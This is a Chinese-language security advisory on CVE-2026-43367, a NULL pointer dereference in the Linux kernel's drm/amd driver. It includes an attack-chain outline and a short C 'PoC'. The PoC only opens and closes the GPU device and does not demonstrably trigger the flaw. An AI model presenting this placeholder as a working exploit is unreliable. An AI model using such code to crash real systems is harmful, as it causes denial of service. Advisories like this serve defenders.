CVE-2026-43367 CVSS 5.5 中危

CVE-2026-43367: Linux内核drm/amd空指针解引用漏洞

披露日期: 2026-05-08

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43367

漏洞类型

空指针解引用 (NULL Pointer Dereference)

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核drm/amd驱动程序在设备清理过程中存在空指针解引用漏洞。当处理不支持硬件的版本指针时，由于缺少必要的非空校验，直接访问空指针导致内核崩溃。本地低权限用户无需交互即可利用此漏洞造成拒绝服务攻击，严重影响系统稳定性。

技术细节

该漏洞源于Linux内核drm/amd驱动模块中设备清理逻辑的缺陷。在检测到不支持的硬件时，特定的版本指针可能处于未初始化的NULL状态。然而，清理代码路径中缺少必要的非空判断，直接对该指针进行解引用操作。由于该漏洞的攻击向量为本地（AV:L），且不需要特殊的用户交互（UI:N），本地低权限攻击者可以轻松触发此代码路径。一旦触发，将导致内核发生空指针异常，进而引发系统崩溃或内核恐慌（Kernel Panic），造成系统拒绝服务。补丁通过在关键位置添加NULL指针检查来修复此问题，确保在访问指针前其有效性已得到验证，从而防止系统崩溃。此类漏洞通常发生在驱动程序处理硬件初始化失败或资源释放的过程中。

攻击链分析

STEP 1

1. 信息收集

攻击者确认目标系统运行受影响的Linux内核版本，且加载了存在漏洞的drm/amd驱动程序。

STEP 2

2. 获取访问权限

攻击者在目标系统上获得本地低权限用户账号（PR:L）。

STEP 3

3. 触发漏洞

攻击者执行恶意程序，调用drm/amd驱动的特定清理路径，访问未初始化的空指针。

STEP 4

4. 拒绝服务

内核发生空指针解引用错误，导致系统崩溃或重启（A:H），实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-43367
 * This code attempts to trigger the NULL pointer dereference
 * in the drm/amd device cleanup path on vulnerable hardware.
 */

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>

#define DEVICE_PATH "/dev/dri/card0"

int main() {
    int fd;
    
    // Attempt to open the AMD GPU device
    fd = open(DEVICE_PATH, O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return EXIT_FAILURE;
    }

    printf("Device opened successfully. Attempting to trigger cleanup path...\n");

    // On vulnerable systems, specific interactions or simply triggering
    // the device cleanup logic (e.g., closing the device on unsupported hw)
    // may lead to a kernel panic due to NULL pointer dereference.
    
    close(fd);
    
    printf("Interaction completed. Check kernel logs for crashes.\n");
    return EXIT_SUCCESS;
}

影响范围

Linux Kernel (特定版本，包含漏洞提交f5a05f84之前的版本)

防御指南

临时缓解措施

建议立即应用Linux内核官方提供的补丁更新。如果无法立即升级，应严格限制本地用户的访问权限，并部署系统监控机制以检测内核异常崩溃情况。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表